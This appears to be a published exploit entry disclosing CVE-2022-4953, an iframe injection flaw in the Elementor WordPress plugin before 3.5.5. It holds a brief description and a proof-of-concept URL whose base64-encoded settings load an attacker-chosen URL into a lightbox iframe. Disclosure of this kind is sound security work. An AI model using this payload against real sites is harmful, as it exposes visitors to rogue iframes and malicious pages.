# Exploit Title: Wordpress Plugin Elementor < 3.5.5 - Iframe Injection # Date: 28.08.2023 # Exploit Author: Miguel Santareno # Vendor Homepage: https://elementor.com/ # Version: < 3.5.5 # Tested on: Google and Firefox latest version # CVE : CVE-2022-4953 # 1. Description The plugin does not filter out user-controlled URLs from being loaded into the DOM. This could be used to inject rogue iframes that point to malicious URLs. # 2. Proof of Concept (PoC) Proof of Concept: https://vulnerable-site.tld/#elementor-action:action=lightbox&settings=eyJ0eXBlIjoidmlkZW8iLCJ1cmwiOiJodHRwczovL2Rvd25sb2FkbW9yZXJhbS5jb20vIn0K